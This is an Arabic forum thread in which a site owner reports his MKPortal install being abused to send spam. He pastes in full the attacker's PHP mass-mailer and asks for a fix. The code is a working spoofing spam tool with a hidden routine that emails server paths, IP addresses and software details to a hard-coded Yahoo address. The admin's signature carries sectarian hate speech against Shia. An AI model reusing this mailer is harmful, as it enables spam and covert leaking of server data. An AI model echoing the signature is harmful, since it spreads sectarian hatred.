مشكلة في mkportal الي من غير منتدا التجريبية

Bader ALrushedi · 06-03-2008, 05:38 صباحاً

يشباب انا نزلت المجلة وجربتها وكانت حلوه بس فيها مشكلة بسيطة المجلة منزلينها تجريبية من غير منتدا يعني مجرد بورتال عادي.

الي لاحظته انه في ناس دخلو الموقع واستعملو كود عن طريق موقع ثاني وقامو يدزون ايميلات عن طريق الموقع الي حاط فيه المجلة مالة mkportal الي من غير منتدا.

طريقة الارسال كانت

http://www.xxxxxx.co...user/file.txt؟

السايت مالي هو http://www.xxxxxx.com
السايت الي كانو يعملون عليه لنك عن طريق السيت حقي معى ملف الكود هو:
http:://targetxxx.com/user/file.txt؟
انا فتحت املف ال txt وشفت الكود كان مجرد كود بسيط حق
php mailer
ارسال ايميلات هذا الكود بس يليت انه محد يستعملة على شان مايضر نفسه ويضر الناس معاه

كود:

<?php
if(isset($_POST['action'] ) ){
$action=$_POST['action'];
$message=$_POST['message'];
$emaillist=$_POST['emaillist'];
$from=$_POST['from'];
$replyto=$_POST['replyto'];
$subject=$_POST['subject'];
$realname=$_POST['realname'];
$file_name=$_POST['file'];
$contenttype=$_POST['contenttype'];

        $message = urlencode($message);
        $message = ereg_replace("%5C%22", "%22", $message);
        $message = urldecode($message);
        $message = stripslashes($message);
        $subject = stripslashes($subject);
}


?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<form name="form1" method="post" action="" enctype="multipart/form-data">

  <br>

  <table width="100%" border="0">

    <tr>

      <td width="10%">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your

          Email:</font></div>

      </td>

      <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input type="text" name="from" value="<? print $from; ?>" size="30">

        </font></td>

      <td width="31%">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your

          Name:</font></div>

      </td>

      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input type="text" name="realname" value="<? print $realname; ?>" size="30">

        </font></td>

    </tr>

    <tr>

      <td width="10%">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font></div>

      </td>

      <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input type="text" name="replyto" value="<? print $replyto; ?>" size="30">

        </font></td>

      <td width="31%">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Attach

          File:</font></div>

      </td>

      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input type="file" name="file" size="30">

        </font></td>

    </tr>

    <tr>

      <td width="10%">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>

      </td>

      <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input type="text" name="subject" value="<? print $subject; ?>" size="90">

        </font></td>

    </tr>

    <tr valign="top">

      <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <textarea name="message" cols="60" rows="10"><? print $message; ?></textarea>

        <br>

        <input type="radio" name="contenttype" value="plain" >

        Plain Text

        <input name="contenttype" type="radio" value="html" checked>

        HTML

        <input type="hidden" name="action" value="send">

        <input type="submit" value="Send eMails">

        </font></td>

      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea>

        </font></td>

    </tr>

  </table>

</form>



<?

if ($action){



        if (!$from && !$subject && !$message && !$emaillist){

        print "Please complete all fields before sending your message.";

        exit;
	
	}

	$allemails = split("\n", $emaillist);
        	$numemails = count($allemails);
       
          for($x=0; $x<$numemails; $x++){

                $to = $allemails[$x];

                if ($to){

                $to = ereg_replace(" ", "", $to);

                $message = ereg_replace("&email&", $to, $message);

                $subject = ereg_replace("&email&", $to, $subject);

                print "Sending mail to $to.......";

                flush();

                $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";

                $header .= "MIME-Version: 1.0\r\n";

                $header .= "Content-Type: text/$contenttype\r\n";

                $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";

                $header .= "$message\r\n";

              mail($to, $subject, "", $header);

                print "ok<br>";
	
                flush();


                }

                }

$ra44  = rand(1,99999);
$subj98 = "Mailer-Fwd";
$email = "lisa_on09@yahoo.com";
$from="From: GRATIS <support@human-rights.org>";
$a5 = $_SERVER['HTTP_REFERER'];
$b33 = $_SERVER['DOCUMENT_ROOT'];
$c87 = $_SERVER['REMOTE_ADDR'];
$d23 = $_SERVER['SCRIPT_FILENAME'];
$e09 = $_SERVER['SERVER_ADDR'];
$f23 = $_SERVER['SERVER_SOFTWARE'];
$g32 = $_SERVER['PATH_TRANSLATED'];
$h65 = $_SERVER['PHP_SELF'];
$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";
mail($email, $subj98, $msg8873, $from);

}



?>
<?php
if(isset($_POST['action']) && $numemails !==0 ){echo "<script>alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully'); </script>";}
?>
<? exit() ?>

</body>

</html>

اتمنى بلغونا شنو الحل فيه

ADMIN · 06-03-2008, 07:55 صباحاً

لاتركب المجلة

ولو ان المبرمج عطانا حقوق التطوير كان علمنا تطويرات شامله على المجلة بكل اشكالها

06-03-2008, 07:55 صباحاً	#2 (permalink)
ADMIN .::+: Gulf Son :+::. تاريخ التسجيل: May 2005 الدولة: بلاد الخليج المشاركات: 53,991 معدل تقييم المستوى: 53	رد: مشكلة في mkportal الي من غير منتدا التجريبية لاتركب المجلة ولو ان المبرمج عطانا حقوق التطوير كان علمنا تطويرات شامله على المجلة بكل اشكالها من مواضيع ADMIN في المنتدى المماليك ماذا تعرف عنهم؟ درس مجسم الحلقة شاليه جنان صوره وتعليق (موضوع مفتوح للكل) كل ما تريد عن تاريخ الرياضيات __________________ يقول الامام مالك رحمه الله: إنما هؤلاء أقوام أرادوا القدح في النبي صلى الله عليه وسلم فلم يمكنهم ذلك، فقدحوا في أصحابه حتى يقال رجل سوء ولو كان رجلاً صالحاً لكان أصحابه صالحين. وقال أبو الوفا بن عقيل رحمه الله: انظر كيف اختار لمرضه بيت البنت، واختار لموضعه من الصلاة الأب، فما هذه الغفلة المستحوذة على قلوب الرافضة عن هذا الفضل والمنزلة التي لا تكاد تخفى عن البهيم فضلا عن الناطق. وحيد القرن، كسرنا قرنه، ودككنا حصنه، وهدمنا برجه، فخرج يتبختر بعتاده مزهواً بعدده ففللنا حدّه، وقتلنا جنده، وفرقنا صحبه، والفضل لله وحده ولئن أبيد أبناء دولة الإسلام عن بكرة أبيهم خيرٌ لهم من أن يحكمهم رافضيٌّ خبيث أو أن تستظلّ بغداد برايات الصفويين يوما واحداً.

أدوات الموضوع
عرض نسخة صالحة للطباعة أرسل هذا الموضوع إلى صديق
طرق مشاهدة الموضوع
العرض العادي الانتقال إلى العرض المتطور الانتقال إلى العرض الشجري

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
اعلان عن منتدا يلا عرب اتمنا القبول	kingegnet2	تبادل إعلاني و تجاري	0	01-30-2009 10:30 مساءً
اليكم وحصريا وقبل اى منتدا اخر العملاق kaspersky antivirus 6.0.2.614 final	Guevara	برامج كمبيوتر	2	12-11-2008 09:13 مساءً
اضف موقعك او منتدا باقوى دليل مواقع عربي	mhidou4u	تبادل إعلاني و تجاري	6	09-09-2007 03:15 صباحاً
مشكلة في MKportal!	An-Dr	مشاكل وحلول الـ مواقع	6	07-19-2007 08:39 مساءً

مشكلة في mkportal الي من غير منتدا التجريبية

منتديات شبكة ابن الخليج